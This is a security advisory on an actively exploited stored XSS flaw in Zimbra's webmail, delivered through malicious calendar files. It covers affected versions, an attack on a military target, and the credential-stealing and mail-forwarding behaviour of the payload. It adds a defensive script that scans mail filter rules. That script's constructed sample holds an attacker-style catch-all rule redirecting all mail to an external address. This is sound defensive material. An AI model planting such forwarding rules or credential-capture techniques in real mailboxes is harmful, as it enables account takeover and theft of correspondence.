Zimbra Collaboration Suite flaw actively exploited with stored XSS through malicious Calendar files
Take action: If you're using Zimbra Collaboration Suite, update immediately to version 9.0.0 Patch 44 or higher, 10.0.13 or higher, or 10.1.5 or higher. Attackers are already exploiting this flaw with malicious calendar files. Until you patch, be extra cautious opening calendar invitations from unexpected or suspicious senders.
Security researchers report active exploitation of a stored cross-site scripting (XSS) vulnerability in the Zimbra Collaboration Suite (ZCS).
The vulnerability is tracked as CVE-2025-27915 (CVSS score 5.4) and is caused by insufficient sanitization of HTML content within ICS files processed by Zimbra's Classic Web Client. ICS files carry iCalendar data (RFC 5545): plain-text records of meetings, events, and tasks that calendar applications exchange with one another, typically as email attachments to meeting invitations.
The flaw lets a threat actor embed JavaScript in the HTML portion of such a calendar attachment. When the recipient opens the email containing the malicious calendar entry in Zimbra Webmail, the script runs automatically in the user's authenticated session, so everything it does (reading mail, changing account settings) happens with the victim's permissions and without the attacker needing the victim's password.
Vulnerable versions include:
- Zimbra Collaboration Suite (ZCS) version 9.0 (all versions prior to 9.0.0 P44)
- Zimbra Collaboration Suite (ZCS) version 10.0 (all versions prior to 10.0.13)
- Zimbra Collaboration Suite (ZCS) version 10.1 (all versions prior to 10.1.5)
In one documented incident, attackers targeted a Brazilian military organization by spoofing the Libyan Navy's Office of Protocol in a convincing phishing email. The malicious communication contained a weaponized ICS file approximately 100KB in size, significantly larger than typical calendar files. The JavaScript payload within the file was obfuscated using Base64 encoding to evade detection by security tools and to obscure the malicious intent from cursory examination.
The JavaScript payload delivered through this exploit is a purpose-built data stealer for Zimbra webmail environments. Analysis by StrikeReady researchers found the code split into several asynchronous Immediately Invoked Function Expressions (IIFEs), functions that run as soon as they are defined and keep their variables out of the page's global scope, so each routine starts on load without interfering with the rest of the page.
The malware's credential theft routine injects hidden form fields into the login page to capture usernames and passwords as victims authenticate. It monitors mouse and keyboard activity, and when the user goes idle it logs them out to force a re-login, capturing the credentials at that moment rather than at a time the user would notice.
The payload also adds a malicious email filter rule that forwards every incoming message to an external Proton Mail address, so the attackers keep receiving copies of future correspondence even after their access to the compromised session ends.
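A forwarding rule of this kind survives a password reset, so hunting for it is part of the response. The following is an added example, not Zimbra code and not from the advisory: it audits a mailbox's Sieve filter script for rules that redirect mail outside your own domains and notes whether the rule's condition matches everything. It assumes the script text is what Zimbra stores for a user's incoming filters (the `zimbraMailSieveScript` attribute), that Zimbra precedes each generated rule with a `# <rule name>` comment, and that `example.mil` is one of your internal domains; the sample script is constructed.

```javascript
// Added example, not Zimbra code and not from the advisory. Audits a Zimbra
// user's incoming-filter Sieve script for redirects to external addresses.
// Assumptions: rules are preceded by "# <name>" comments (Zimbra's convention)
// and INTERNAL_DOMAINS lists your own mail domains. Sample input is constructed.

const INTERNAL_DOMAINS = new Set(['example.mil']);   // assumption: your own mail domains

function splitRules(sieve) {
  // Zimbra writes one "# name" comment line above each rule it generates;
  // everything before the first comment (the require line) belongs to no rule.
  const rules = [];
  let current = null;
  for (const line of sieve.split(/\r?\n/)) {
    const m = line.match(/^#\s*(.*)$/);
    if (m) { current = { name: m[1].trim(), body: '' }; rules.push(current); continue; }
    if (current) current.body += line + '\n';
  }
  return rules;
}

function redirectTargets(body) {
  // redirect "addr"; or redirect :copy "addr"; (RFC 5228 / RFC 3894)
  return [...body.matchAll(/\bredirect\s+(?::copy\s+)?"([^"]+)"/g)].map(m => m[1].toLowerCase());
}

function isCatchAll(body) {
  // Heuristic: `if true`, or a header test against the empty string, matches every message.
  return /\bif\s+true\b/.test(body) || /:contains\s+(?:\[[^\]]*\]|"[^"]*")\s+""/.test(body);
}

function auditSieve(account, sieve) {
  const findings = [];
  for (const rule of splitRules(sieve)) {
    for (const target of redirectTargets(rule.body)) {
      const domain = target.split('@')[1] || '';
      if (!INTERNAL_DOMAINS.has(domain)) {
        findings.push({ account, rule: rule.name, target, catchAll: isCatchAll(rule.body) });
      }
    }
  }
  return findings;
}

// Constructed sample: one legitimate filing rule, one attacker-added forwarder
// whose empty "from" match sends every message to an external mailbox.
const SAMPLE_SIEVE = [
  'require ["fileinto", "reject", "tag", "flag", "copy"];',
  '',
  '# Receipts',
  'if anyof (header :contains ["subject"] "invoice") {',
  '    fileinto "Finance";',
  '    stop;',
  '}',
  '',
  '# Sync',
  'if anyof (header :contains ["from"] "") {',
  '    redirect "backup-mailbox@proton.me";',
  '    keep;',
  '}',
].join('\n');

console.log(auditSieve('victim@example.mil', SAMPLE_SIEVE));
```

Feed it the script for every account (on the mailbox server, `zmprov ga <account> zimbraMailSieveScript` prints it; confirm the attribute name on your build) and review each hit: an innocuous-looking rule name and a free-mail destination together are the pattern described above. Remove the rule and rotate the credentials in the same change, since the payload also harvested the login.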
Organizations running affected versions should upgrade immediately to one of the patched releases: ZCS 9.0.0 Patch 44, ZCS 10.0.13, or ZCS 10.1.5. Zimbra patches are cumulative, so the later releases it has issued since, including 9.0.0 Patch 46, 10.0.15, and 10.1.9 released in June 2025, also contain the fix.